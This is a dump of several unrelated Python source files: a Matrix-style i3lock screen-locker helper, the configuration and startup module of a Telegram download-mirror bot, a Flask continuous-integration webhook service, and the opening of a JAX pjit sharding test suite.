self.handle_request()
if self._timeout_encountered:
break
def handle_timeout(self):
self._timeout_encountered = True
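# Usage sketch, mirroring how main() drives SubprocessServer (hypothetical values):
#     with SubprocessServer(('', 0), num_requests=2) as server:
#         port = server.server_address[1]
#         ...  # each terminal runs: curl -X POST localhost:<port>/$$
#     # after the locker exits, server.received_posts holds paths like '/12345'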
class SubprocessHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.server.received_posts.append(self.path)
self.send_response(200)
self.end_headers()
def log_message(self, format, *args):
return
if __name__ == '__main__':
parser = ArgumentParser(description='Alternative to i3lock that displays the Matrix')
parser.add_argument(
'delay', type=int, nargs='?', default=0,
help='Seconds between blanking out the screen and starting the Matrix'
)
parser.add_argument(
        '--locker', help='The locker to use', default='i3lock'
)
parser.add_argument(
        '--terminal', help='The terminal to use (if using urxvt, please set the instance to be fullscreen in your i3 config)', default='xfce4-terminal'
)
args = parser.parse_args()
    main(args.delay, args.terminal, args.locker)
|
__init__.py
|
import logging
import socket
import faulthandler
from telegram.ext import Updater as tgUpdater
from qbittorrentapi import Client as qbClient
from aria2p import API as ariaAPI, Client as ariaClient
from os import remove as osremove, path as ospath, environ
from requests import get as rget
from json import loads as jsnloads
from subprocess import Popen, run as srun, check_output
from time import sleep, time
from threading import Thread, Lock
from pyrogram import Client
from dotenv import load_dotenv
faulthandler.enable()
socket.setdefaulttimeout(600)
botStartTime = time()
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
handlers=[logging.FileHandler('log.txt'), logging.StreamHandler()],
level=logging.INFO)
LOGGER = logging.getLogger(__name__)
load_dotenv('config.env', override=True)
def getConfig(name: str):
return environ[name]
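# Most of the try/except blocks below repeat one pattern: read a variable, treat
# an empty string as unset, and fall back to a default (optionally casting).
# _config_or_default is a condensed sketch of that pattern, for illustration
# only; the module itself keeps the explicit blocks.
def _config_or_default(name: str, default=None, cast=str):
    value = environ.get(name, '')
    return cast(value) if len(value) != 0 else default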
try:
NETRC_URL = getConfig('NETRC_URL')
if len(NETRC_URL) == 0:
raise KeyError
try:
res = rget(NETRC_URL)
if res.status_code == 200:
with open('.netrc', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download .netrc {res.status_code}")
except Exception as e:
logging.error(f"NETRC_URL: {e}")
except KeyError:
pass
try:
SERVER_PORT = getConfig('SERVER_PORT')
if len(SERVER_PORT) == 0:
raise KeyError
except KeyError:
SERVER_PORT = 80
PORT = environ.get('PORT', SERVER_PORT)
web = Popen([f"gunicorn web.wserver:app --bind 0.0.0.0:{PORT}"], shell=True)
alive = Popen(["python3", "alive.py"])
srun(["qbittorrent-nox", "-d", "--profile=."])
if not ospath.exists('.netrc'):
srun(["touch", ".netrc"])
srun(["cp", ".netrc", "/root/.netrc"])
srun(["chmod", "600", ".netrc"])
srun(["chmod", "+x", "aria.sh"])
a2c = Popen(["./aria.sh"], shell=True)
sleep(1)
Interval = []
DRIVES_NAMES = []
DRIVES_IDS = []
INDEX_URLS = []
try:
if bool(getConfig('_____REMOVE_THIS_LINE_____')):
        logging.error('The README.md file is there to be read! Exiting now!')
exit()
except KeyError:
pass
aria2 = ariaAPI(
ariaClient(
host="http://localhost",
port=6800,
secret="",
)
)
def get_client():
return qbClient(host="localhost", port=8090)
trackers = check_output(["curl -Ns https://raw.githubusercontent.com/XIU2/TrackersListCollection/master/all.txt https://ngosang.github.io/trackerslist/trackers_all_http.txt https://newtrackon.com/api/all | awk '$0'"], shell=True).decode('utf-8')
trackerslist = set(trackers.split("\n"))
trackerslist.remove("")
trackerslist = "\n\n".join(trackerslist)
get_client().application.set_preferences({"add_trackers": f"{trackerslist}"})
DOWNLOAD_DIR = None
BOT_TOKEN = None
download_dict_lock = Lock()
status_reply_dict_lock = Lock()
# Key: update.effective_chat.id
# Value: telegram.Message
status_reply_dict = {}
# Key: update.message.message_id
# Value: An object of Status
download_dict = {}
# key: rss_title
# value: [rss_feed, last_link, last_title, filter]
rss_dict = {}
AUTHORIZED_CHATS = set()
SUDO_USERS = set()
AS_DOC_USERS = set()
AS_MEDIA_USERS = set()
if ospath.exists('authorized_chats.txt'):
with open('authorized_chats.txt', 'r+') as f:
lines = f.readlines()
for line in lines:
AUTHORIZED_CHATS.add(int(line.split()[0]))
if ospath.exists('sudo_users.txt'):
with open('sudo_users.txt', 'r+') as f:
lines = f.readlines()
for line in lines:
SUDO_USERS.add(int(line.split()[0]))
try:
achats = getConfig('AUTHORIZED_CHATS')
achats = achats.split(" ")
for chats in achats:
AUTHORIZED_CHATS.add(int(chats))
except:
pass
try:
schats = getConfig('SUDO_USERS')
schats = schats.split(" ")
for chats in schats:
SUDO_USERS.add(int(chats))
except:
pass
try:
BOT_TOKEN = getConfig('BOT_TOKEN')
parent_id = getConfig('GDRIVE_FOLDER_ID')
DOWNLOAD_DIR = getConfig('DOWNLOAD_DIR')
if not DOWNLOAD_DIR.endswith("/"):
DOWNLOAD_DIR = DOWNLOAD_DIR + '/'
DOWNLOAD_STATUS_UPDATE_INTERVAL = int(getConfig('DOWNLOAD_STATUS_UPDATE_INTERVAL'))
OWNER_ID = int(getConfig('OWNER_ID'))
AUTO_DELETE_MESSAGE_DURATION = int(getConfig('AUTO_DELETE_MESSAGE_DURATION'))
TELEGRAM_API = getConfig('TELEGRAM_API')
TELEGRAM_HASH = getConfig('TELEGRAM_HASH')
except KeyError as e:
LOGGER.error("One or more env variables missing! Exiting now")
exit(1)
LOGGER.info("Generating BOT_STRING_SESSION")
app = Client('pyrogram', api_id=int(TELEGRAM_API), api_hash=TELEGRAM_HASH, bot_token=BOT_TOKEN, no_updates=True)
try:
USER_STRING_SESSION = getConfig('USER_STRING_SESSION')
if len(USER_STRING_SESSION) == 0:
raise KeyError
except KeyError:
USER_STRING_SESSION = None
if USER_STRING_SESSION is not None:
rss_session = Client(USER_STRING_SESSION, api_id=int(TELEGRAM_API), api_hash=TELEGRAM_HASH)
else:
rss_session = None
def aria2c_init():
try:
logging.info("Initializing Aria2c")
link = "https://releases.ubuntu.com/21.10/ubuntu-21.10-desktop-amd64.iso.torrent"
dire = DOWNLOAD_DIR.rstrip("/")
aria2.add_uris([link], {'dir': dire})
sleep(3)
downloads = aria2.get_downloads()
sleep(30)
for download in downloads:
aria2.remove([download], force=True, files=True)
except Exception as e:
logging.error(f"Aria2c initializing error: {e}")
pass
if not ospath.isfile(".restartmsg"):
sleep(1)
Thread(target=aria2c_init).start()
sleep(1.5)
try:
DB_URI = getConfig('DATABASE_URL')
if len(DB_URI) == 0:
raise KeyError
except KeyError:
DB_URI = None
try:
TG_SPLIT_SIZE = getConfig('TG_SPLIT_SIZE')
if len(TG_SPLIT_SIZE) == 0 or int(TG_SPLIT_SIZE) > 2097151000:
raise KeyError
else:
TG_SPLIT_SIZE = int(TG_SPLIT_SIZE)
except KeyError:
TG_SPLIT_SIZE = 2097151000
try:
STATUS_LIMIT = getConfig('STATUS_LIMIT')
if len(STATUS_LIMIT) == 0:
raise KeyError
else:
STATUS_LIMIT = int(STATUS_LIMIT)
except KeyError:
STATUS_LIMIT = None
try:
MEGA_API_KEY = getConfig('MEGA_API_KEY')
if len(MEGA_API_KEY) == 0:
raise KeyError
except KeyError:
logging.warning('MEGA API KEY not provided!')
MEGA_API_KEY = None
try:
MEGA_EMAIL_ID = getConfig('MEGA_EMAIL_ID')
MEGA_PASSWORD = getConfig('MEGA_PASSWORD')
if len(MEGA_EMAIL_ID) == 0 or len(MEGA_PASSWORD) == 0:
raise KeyError
except KeyError:
logging.warning('MEGA Credentials not provided!')
MEGA_EMAIL_ID = None
MEGA_PASSWORD = None
try:
UPTOBOX_TOKEN = getConfig('UPTOBOX_TOKEN')
if len(UPTOBOX_TOKEN) == 0:
raise KeyError
except KeyError:
UPTOBOX_TOKEN = None
try:
INDEX_URL = getConfig('INDEX_URL').rstrip("/")
if len(INDEX_URL) == 0:
raise KeyError
else:
INDEX_URLS.append(INDEX_URL)
except KeyError:
INDEX_URL = None
INDEX_URLS.append(None)
try:
SEARCH_API_LINK = getConfig('SEARCH_API_LINK').rstrip("/")
if len(SEARCH_API_LINK) == 0:
raise KeyError
except KeyError:
SEARCH_API_LINK = None
try:
SEARCH_LIMIT = getConfig('SEARCH_LIMIT')
if len(SEARCH_LIMIT) == 0:
raise KeyError
else:
SEARCH_LIMIT = int(SEARCH_LIMIT)
except KeyError:
SEARCH_LIMIT = 0
try:
RSS_COMMAND = getConfig('RSS_COMMAND')
if len(RSS_COMMAND) == 0:
raise KeyError
except KeyError:
RSS_COMMAND = None
try:
CMD_INDEX = getConfig('CMD_INDEX')
if len(CMD_INDEX) == 0:
raise KeyError
except KeyError:
CMD_INDEX = ''
try:
TORRENT_DIRECT_LIMIT = getConfig('TORRENT_DIRECT_LIMIT')
if len(TORRENT_DIRECT_LIMIT) == 0:
raise KeyError
else:
TORRENT_DIRECT_LIMIT = float(TORRENT_DIRECT_LIMIT)
except KeyError:
TORRENT_DIRECT_LIMIT = None
try:
CLONE_LIMIT = getConfig('CLONE_LIMIT')
if len(CLONE_LIMIT) == 0:
raise KeyError
else:
CLONE_LIMIT = float(CLONE_LIMIT)
except KeyError:
CLONE_LIMIT = None
try:
MEGA_LIMIT = getConfig('MEGA_LIMIT')
if len(MEGA_LIMIT) == 0:
raise KeyError
else:
MEGA_LIMIT = float(MEGA_LIMIT)
except KeyError:
MEGA_LIMIT = None
try:
STORAGE_THRESHOLD = getConfig('STORAGE_THRESHOLD')
if len(STORAGE_THRESHOLD) == 0:
raise KeyError
else:
STORAGE_THRESHOLD = float(STORAGE_THRESHOLD)
except KeyError:
STORAGE_THRESHOLD = None
try:
ZIP_UNZIP_LIMIT = getConfig('ZIP_UNZIP_LIMIT')
if len(ZIP_UNZIP_LIMIT) == 0:
raise KeyError
else:
ZIP_UNZIP_LIMIT = float(ZIP_UNZIP_LIMIT)
except KeyError:
ZIP_UNZIP_LIMIT = None
try:
RSS_CHAT_ID = getConfig('RSS_CHAT_ID')
if len(RSS_CHAT_ID) == 0:
raise KeyError
else:
RSS_CHAT_ID = int(RSS_CHAT_ID)
except KeyError:
RSS_CHAT_ID = None
try:
RSS_DELAY = getConfig('RSS_DELAY')
if len(RSS_DELAY) == 0:
raise KeyError
else:
RSS_DELAY = int(RSS_DELAY)
except KeyError:
RSS_DELAY = 900
try:
QB_TIMEOUT = getConfig('QB_TIMEOUT')
if len(QB_TIMEOUT) == 0:
raise KeyError
else:
QB_TIMEOUT = int(QB_TIMEOUT)
except KeyError:
QB_TIMEOUT = None
try:
BUTTON_FOUR_NAME = getConfig('BUTTON_FOUR_NAME')
BUTTON_FOUR_URL = getConfig('BUTTON_FOUR_URL')
if len(BUTTON_FOUR_NAME) == 0 or len(BUTTON_FOUR_URL) == 0:
raise KeyError
except KeyError:
BUTTON_FOUR_NAME = None
BUTTON_FOUR_URL = None
try:
BUTTON_FIVE_NAME = getConfig('BUTTON_FIVE_NAME')
BUTTON_FIVE_URL = getConfig('BUTTON_FIVE_URL')
if len(BUTTON_FIVE_NAME) == 0 or len(BUTTON_FIVE_URL) == 0:
raise KeyError
except KeyError:
BUTTON_FIVE_NAME = None
BUTTON_FIVE_URL = None
try:
BUTTON_SIX_NAME = getConfig('BUTTON_SIX_NAME')
BUTTON_SIX_URL = getConfig('BUTTON_SIX_URL')
if len(BUTTON_SIX_NAME) == 0 or len(BUTTON_SIX_URL) == 0:
raise KeyError
except KeyError:
BUTTON_SIX_NAME = None
BUTTON_SIX_URL = None
try:
STOP_DUPLICATE = getConfig('STOP_DUPLICATE')
STOP_DUPLICATE = STOP_DUPLICATE.lower() == 'true'
except KeyError:
STOP_DUPLICATE = False
try:
VIEW_LINK = getConfig('VIEW_LINK')
VIEW_LINK = VIEW_LINK.lower() == 'true'
except KeyError:
VIEW_LINK = False
try:
IS_TEAM_DRIVE = getConfig('IS_TEAM_DRIVE')
IS_TEAM_DRIVE = IS_TEAM_DRIVE.lower() == 'true'
except KeyError:
IS_TEAM_DRIVE = False
try:
USE_SERVICE_ACCOUNTS = getConfig('USE_SERVICE_ACCOUNTS')
USE_SERVICE_ACCOUNTS = USE_SERVICE_ACCOUNTS.lower() == 'true'
except KeyError:
USE_SERVICE_ACCOUNTS = False
try:
BLOCK_MEGA_FOLDER = getConfig('BLOCK_MEGA_FOLDER')
BLOCK_MEGA_FOLDER = BLOCK_MEGA_FOLDER.lower() == 'true'
except KeyError:
BLOCK_MEGA_FOLDER = False
try:
BLOCK_MEGA_LINKS = getConfig('BLOCK_MEGA_LINKS')
BLOCK_MEGA_LINKS = BLOCK_MEGA_LINKS.lower() == 'true'
except KeyError:
BLOCK_MEGA_LINKS = False
try:
WEB_PINCODE = getConfig('WEB_PINCODE')
WEB_PINCODE = WEB_PINCODE.lower() == 'true'
except KeyError:
WEB_PINCODE = False
try:
SHORTENER = getConfig('SHORTENER')
SHORTENER_API = getConfig('SHORTENER_API')
if len(SHORTENER) == 0 or len(SHORTENER_API) == 0:
raise KeyError
except KeyError:
SHORTENER = None
SHORTENER_API = None
try:
IGNORE_PENDING_REQUESTS = getConfig("IGNORE_PENDING_REQUESTS")
IGNORE_PENDING_REQUESTS = IGNORE_PENDING_REQUESTS.lower() == 'true'
except KeyError:
IGNORE_PENDING_REQUESTS = False
try:
BASE_URL = getConfig('BASE_URL_OF_BOT').rstrip("/")
if len(BASE_URL) == 0:
raise KeyError
except KeyError:
logging.warning('BASE_URL_OF_BOT not provided!')
BASE_URL = None
try:
AS_DOCUMENT = getConfig('AS_DOCUMENT')
AS_DOCUMENT = AS_DOCUMENT.lower() == 'true'
except KeyError:
AS_DOCUMENT = False
try:
EQUAL_SPLITS = getConfig('EQUAL_SPLITS')
EQUAL_SPLITS = EQUAL_SPLITS.lower() == 'true'
except KeyError:
EQUAL_SPLITS = False
try:
QB_SEED = getConfig('QB_SEED')
QB_SEED = QB_SEED.lower() == 'true'
except KeyError:
QB_SEED = False
try:
CUSTOM_FILENAME = getConfig('CUSTOM_FILENAME')
if len(CUSTOM_FILENAME) == 0:
raise KeyError
except KeyError:
CUSTOM_FILENAME = None
try:
CRYPT = getConfig('CRYPT')
if len(CRYPT) == 0:
raise KeyError
except KeyError:
CRYPT = None
try:
TOKEN_PICKLE_URL = getConfig('TOKEN_PICKLE_URL')
if len(TOKEN_PICKLE_URL) == 0:
raise KeyError
try:
res = rget(TOKEN_PICKLE_URL)
if res.status_code == 200:
with open('token.pickle', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download token.pickle, link got HTTP response: {res.status_code}")
except Exception as e:
logging.error(f"TOKEN_PICKLE_URL: {e}")
except KeyError:
pass
try:
ACCOUNTS_ZIP_URL = getConfig('ACCOUNTS_ZIP_URL')
if len(ACCOUNTS_ZIP_URL) == 0:
raise KeyError
else:
try:
res = rget(ACCOUNTS_ZIP_URL)
if res.status_code == 200:
with open('accounts.zip', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download accounts.zip, link got HTTP response: {res.status_code}")
except Exception as e:
logging.error(f"ACCOUNTS_ZIP_URL: {e}")
raise KeyError
srun(["unzip", "-q", "-o", "accounts.zip"])
srun(["chmod", "-R", "777", "accounts"])
osremove("accounts.zip")
except KeyError:
pass
try:
MULTI_SEARCH_URL = getConfig('MULTI_SEARCH_URL')
if len(MULTI_SEARCH_URL) == 0:
raise KeyError
try:
res = rget(MULTI_SEARCH_URL)
if res.status_code == 200:
with open('drive_folder', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download drive_folder, link got HTTP response: {res.status_code}")
except Exception as e:
logging.error(f"MULTI_SEARCH_URL: {e}")
except KeyError:
pass
try:
YT_COOKIES_URL = getConfig('YT_COOKIES_URL')
if len(YT_COOKIES_URL) == 0:
raise KeyError
try:
res = rget(YT_COOKIES_URL)
if res.status_code == 200:
with open('cookies.txt', 'wb+') as f:
f.write(res.content)
else:
logging.error(f"Failed to download cookies.txt, link got HTTP response: {res.status_code}")
except Exception as e:
logging.error(f"YT_COOKIES_URL: {e}")
except KeyError:
pass
DRIVES_NAMES.append("Main")
DRIVES_IDS.append(parent_id)
if ospath.exists('drive_folder'):
with open('drive_folder', 'r+') as f:
lines = f.readlines()
for line in lines:
try:
temp = line.strip().split()
DRIVES_IDS.append(temp[1])
DRIVES_NAMES.append(temp[0].replace("_", " "))
except:
pass
try:
INDEX_URLS.append(temp[2])
except IndexError as e:
INDEX_URLS.append(None)
try:
SEARCH_PLUGINS = getConfig('SEARCH_PLUGINS')
if len(SEARCH_PLUGINS) == 0:
raise KeyError
SEARCH_PLUGINS = jsnloads(SEARCH_PLUGINS)
except KeyError:
SEARCH_PLUGINS = None
updater = tgUpdater(token=BOT_TOKEN, request_kwargs={'read_timeout': 20, 'connect_timeout': 15})
bot = updater.bot
dispatcher = updater.dispatcher
job_queue = updater.job_queue
|
ci.py
|
import json
import logging
import collections
import requests
import threading
import time
from batch.client import Job
from flask import Flask, request, jsonify, render_template
from flask_cors import CORS
from .batch_helper import try_to_cancel_job, job_ordering
from .ci_logging import log
from .constants import BUILD_JOB_TYPE, GCS_BUCKET, DEPLOY_JOB_TYPE
from .environment import \
batch_client, \
WATCHED_TARGETS, \
REFRESH_INTERVAL_IN_SECONDS
from .git_state import Repo, FQRef, FQSHA
from .github import open_pulls, overall_review_state, latest_sha_for_ref
from .google_storage import \
upload_public_gs_file_from_filename, \
upload_public_gs_file_from_string
from .http_helper import BadStatus, get_repo
from .pr import GitHubPR
from .prs import PRS
prs = PRS({k: v for [k, v] in WATCHED_TARGETS})
app = Flask(__name__)
CORS(app)
@app.errorhandler(BadStatus)
def handle_invalid_usage(error):
log.exception('bad status found when making request')
return jsonify(error.data), error.status_code
@app.route('/status')
def status():
return jsonify(prs.to_json())
@app.route('/push', methods=['POST'])
def github_push():
d = request.json
if 'zen' in d:
log.info(f'received zen: {d["zen"]}')
return '', 200
ref = d['ref']
if ref.startswith('refs/heads'):
target_ref = FQRef(Repo.from_gh_json(d['repository']), ref[11:])
target = FQSHA(target_ref, d['after'])
prs.push(target)
else:
log.info(
f'ignoring ref push {ref} because it does not start with '
'"refs/heads/"'
)
return '', 200
@app.route('/pull_request', methods=['POST'])
def github_pull_request():
d = request.json
if 'zen' in d:
log.info(f'received zen: {d["zen"]}')
return '', 200
assert 'action' in d, d
assert 'pull_request' in d, d
action = d['action']
if action in ('opened', 'synchronize'):
target_sha = FQSHA.from_gh_json(d['pull_request']['base']).sha
gh_pr = GitHubPR.from_gh_json(d['pull_request'], target_sha)
prs.pr_push(gh_pr)
elif action == 'closed':
gh_pr = GitHubPR.from_gh_json(d['pull_request'])
log.info(f'forgetting closed pr {gh_pr.short_str()}')
prs.forget(gh_pr.source.ref, gh_pr.target_ref)
else:
log.info(f'ignoring pull_request with action {action}')
return '', 200
@app.route('/pull_request_review', methods=['POST'])
def github_pull_request_review():
d = request.json
if 'zen' in d:
log.info(f'received zen: {d["zen"]}')
return '', 200
action = d['action']
gh_pr = GitHubPR.from_gh_json(d['pull_request'])
if action == 'submitted':
state = d['review']['state'].lower()
if state == 'changes_requested':
prs.review(gh_pr, state)
else:
# FIXME: track all reviewers, then we don't need to talk to github
prs.review(
gh_pr,
overall_review_state(
get_reviews(gh_pr.target_ref.repo,
gh_pr.number))['state'])
elif action == 'dismissed':
# FIXME: track all reviewers, then we don't need to talk to github
prs.review(
gh_pr,
overall_review_state(get_reviews(gh_pr.target_ref.repo,
gh_pr.number))['state'])
else:
log.info(f'ignoring pull_request_review with action {action}')
return '', 200
@app.route('/ci_build_done', methods=['POST'])
def ci_build_done():
d = request.json
attributes = d['attributes']
source = FQSHA.from_json(json.loads(attributes['source']))
target = FQSHA.from_json(json.loads(attributes['target']))
job = Job(batch_client, d['id'], attributes=attributes, _status=d)
receive_ci_job(source, target, job)
return '', 200
@app.route('/deploy_build_done', methods=['POST'])
def deploy_build_done():
d = request.json
attributes = d['attributes']
target = FQSHA.from_json(json.loads(attributes['target']))
job = Job(batch_client, d['id'], attributes=attributes, _status=d)
receive_deploy_job(target, job)
return '', 200
@app.route('/refresh_batch_state', methods=['POST'])
def refresh_batch_state():
jobs = batch_client.list_jobs()
build_jobs = [
job for job in jobs
if job.attributes and job.attributes.get('type', None) == BUILD_JOB_TYPE
]
refresh_ci_build_jobs(build_jobs)
deploy_jobs = [
job for job in jobs
if job.attributes and job.attributes.get('type', None) == DEPLOY_JOB_TYPE
]
refresh_deploy_jobs(deploy_jobs)
return '', 200
def refresh_ci_build_jobs(jobs):
jobs = [
(FQSHA.from_json(json.loads(job.attributes['source'])),
FQSHA.from_json(json.loads(job.attributes['target'])),
job)
for job in jobs
]
jobs = [(s, t, j) for (s, t, j) in jobs if prs.exists(s, t)]
latest_jobs = {}
for (source, target, job) in jobs:
key = (source, target)
job2 = latest_jobs.get(key, None)
if job2 is None:
latest_jobs[key] = job
else:
if job_ordering(job, job2) > 0:
log.info(
f'cancelling {job2.id}, preferring {job.id}'
)
try_to_cancel_job(job2)
latest_jobs[key] = job
else:
log.info(
f'cancelling {job.id}, preferring {job2.id}'
)
try_to_cancel_job(job)
prs.refresh_from_ci_jobs(latest_jobs)
def refresh_deploy_jobs(jobs):
jobs = [
(FQSHA.from_json(json.loads(job.attributes['target'])),
job)
for job in jobs
if 'target' in job.attributes
]
jobs = [
(target, job)
for (target, job) in jobs
if target.ref in prs.deploy_jobs
]
latest_jobs = {}
for (target, job) in jobs:
job2 = latest_jobs.get(target, None)
if job2 is None:
latest_jobs[target] = job
else:
if job_ordering(job, job2) > 0:
log.info(
f'cancelling {job2.id}, preferring {job.id}'
)
try_to_cancel_job(job2)
latest_jobs[target] = job
else:
log.info(
f'cancelling {job.id}, preferring {job2.id}'
)
try_to_cancel_job(job)
prs.refresh_from_deploy_jobs(latest_jobs)
@app.route('/force_retest', methods=['POST'])
def force_retest():
d = request.json
source = FQRef.from_json(d['source'])
target = FQRef.from_json(d['target'])
prs.build(source, target)
return '', 200
@app.route('/force_redeploy', methods=['POST'])
def force_redeploy():
d = request.json
target = FQRef.from_json(d)
if target in prs.watched_target_refs():
prs.try_deploy(target)
return '', 200
else:
return f'{target.short_str()} not in {[ref.short_str() for ref in prs.watched_target_refs()]}', 400
@app.route('/refresh_github_state', methods=['POST'])
def refresh_github_state():
for target_repo in prs.watched_repos():
try:
pulls = open_pulls(target_repo)
pulls_by_target = collections.defaultdict(list)
latest_target_shas = {}
for pull in pulls:
gh_pr = GitHubPR.from_gh_json(pull)
if gh_pr.target_ref not in latest_target_shas:
latest_target_shas[gh_pr.target_ref] = latest_sha_for_ref(gh_pr.target_ref)
sha = latest_target_shas[gh_pr.target_ref]
gh_pr.target_sha = sha
pulls_by_target[gh_pr.target_ref].append(gh_pr)
refresh_pulls(target_repo, pulls_by_target)
refresh_reviews(pulls_by_target)
except Exception as e:
log.exception(
f'could not refresh state for {target_repo.short_str()} due to {e}')
return '', 200
def refresh_pulls(target_repo, pulls_by_target):
dead_targets = (
set(prs.live_target_refs_for_repo(target_repo)) -
{x for x in pulls_by_target.keys()}
)
for dead_target_ref in dead_targets:
prs.forget_target(dead_target_ref)
for (target_ref, pulls) in pulls_by_target.items():
for gh_pr in pulls:
prs.pr_push(gh_pr)
dead_prs = ({x.source.ref for x in prs.for_target(target_ref)} -
{x.source.ref for x in pulls})
if len(dead_prs) != 0:
log.info(f'for {target_ref.short_str()}, forgetting {[x.short_str() for x in dead_prs]}')
for source_ref in dead_prs:
prs.forget(source_ref, target_ref)
def refresh_reviews(pulls_by_target):
for (_, pulls) in pulls_by_target.items():
for gh_pr in pulls:
reviews = get_repo(
gh_pr.target_ref.repo.qname,
'pulls/' + gh_pr.number + '/reviews',
status_code=200)
state = overall_review_state(reviews)['state']
prs.review(gh_pr, state)
@app.route('/heal', methods=['POST'])
def heal():
prs.heal()
return '', 200
@app.route('/healthcheck')
def healthcheck():
return '', 200
@app.route('/watched_repo', methods=['POST'])
def set_deployable():
d = request.json
target_ref = FQRef.from_json(d['target_ref'])
action = d['action']
assert action in ('unwatch', 'watch', 'deploy')
prs.update_watch_state(target_ref, action)
return '', 200
@app.route('/ui/')
def ui_index():
targets = {}
for target_ref, deployed_sha in prs.latest_deployed.items():
targets[target_ref] = {
'ref': target_ref,
'deployed_sha': deployed_sha,
'job': prs.deploy_jobs.get(target_ref, None)
}
return render_template(
'index.html',
prs_by_target=prs.all_by_target().items(),
targets=targets)
@app.route('/ui/job-log/<id>')
def job_log(id):
j = batch_client.get_job(id)
return render_template(
'job-log.html',
id=j.id,
log=j.log())
###############################################################################
def receive_ci_job(source, target, job):
upload_public_gs_file_from_string(GCS_BUCKET,
f'ci/{source.sha}/{target.sha}/job.log',
job.cached_status()['log'])
upload_public_gs_file_from_filename(
GCS_BUCKET,
f'ci/{source.sha}/{target.sha}/index.html',
'index.html')
prs.ci_build_finished(source, target, job)
def receive_deploy_job(target, job):
upload_public_gs_file_from_string(GCS_BUCKET,
f'deploy/{target.sha}/job.log',
job.cached_status()['log'])
upload_public_gs_file_from_filename(
GCS_BUCKET,
f'deploy/{target.sha}/index.html',
'deploy-index.html')
prs.deploy_build_finished(target, job)
def get_reviews(repo, pr_number):
return get_repo(
repo.qname,
'pulls/' + pr_number + '/reviews',
status_code=200)
def polling_event_loop():
time.sleep(1)
while True:
try:
r = requests.post(
'http://127.0.0.1:5000/refresh_github_state',
timeout=360)
r.raise_for_status()
r = requests.post(
'http://127.0.0.1:5000/refresh_batch_state',
timeout=360)
r.raise_for_status()
r = requests.post('http://127.0.0.1:5000/heal', timeout=360)
r.raise_for_status()
except Exception as e:
log.error(f'Could not poll due to exception: {e}')
time.sleep(REFRESH_INTERVAL_IN_SECONDS)
def fix_werkzeug_logs():
# https://github.com/pallets/flask/issues/1359#issuecomment-291749259
werkzeug_logger = logging.getLogger('werkzeug')
from werkzeug.serving import WSGIRequestHandler
WSGIRequestHandler.log = lambda self, type, message, *args: \
getattr(werkzeug_logger, type)('%s %s' % (self.address_string(), message % args))
def run():
"""Main entry point."""
fix_werkzeug_logs()
threading.Thread(target=polling_event_loop).start()
app.run(host='0.0.0.0', threaded=False)
|
pjit_test.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap, mesh, Mesh
from jax.experimental import global_device_array
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import (pjit, pjit_p, with_sharding_constraint,
SpecSync, FROM_GDA)
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client
from jax._src.util import prod, curry, unzip2
from jax.config import config
config.parse_flags_with_absl()
def setUpModule():
if jax.default_backend() not in {'gpu', 'tpu'}:
raise unittest.SkipTest("pjit only supports GPU and TPU backends")
jtu.set_spmd_lowering_flag(True)
def tearDownModule():
jtu.restore_spmd_lowering_flag()
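# check_1d_2d_mesh expands a test method into named parameterized cases over a
# 1-D mesh ("x": 2) and two 2-D meshes ("2x1" and "2x2"); with set_mesh=True the
# method is additionally wrapped in jtu.with_mesh_from_kwargs so the requested
# mesh is active while the test body runs.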
@curry
def check_1d_2d_mesh(f, set_mesh):
return parameterized.named_parameters(
{"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
for name, mesh, resources in (
("2", (("x", 2),), "x"),
("2x1", (("x", 2), ("y", 1)), ("x", "y")),
("2x2", (("x", 2), ("y", 2)), ("x", "y")),
))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
def create_global_mesh(mesh_shape, axis_names):
size = prod(mesh_shape)
if len(jax.devices()) < size:
raise unittest.SkipTest(f"Test requires {size} local devices")
mesh_devices = np.array(jax.devices()[:size]).reshape(mesh_shape)
global_mesh = Mesh(mesh_devices, axis_names)
return global_mesh
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
@jtu.with_mesh([('x', 1)])
def testDeviceBufferAval(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
def f(x):
return x
shape = (2, 2)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x)
expected = x
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 1)
self.assertAllClose(
actual.device_buffers[0].to_py(), expected, check_dtypes=False)
# Repro for a bug on device_buffer aval
_ = repr(actual.device_buffers)
@jtu.with_mesh([('x', 2)])
def testBasic1D(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testBasic2D(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
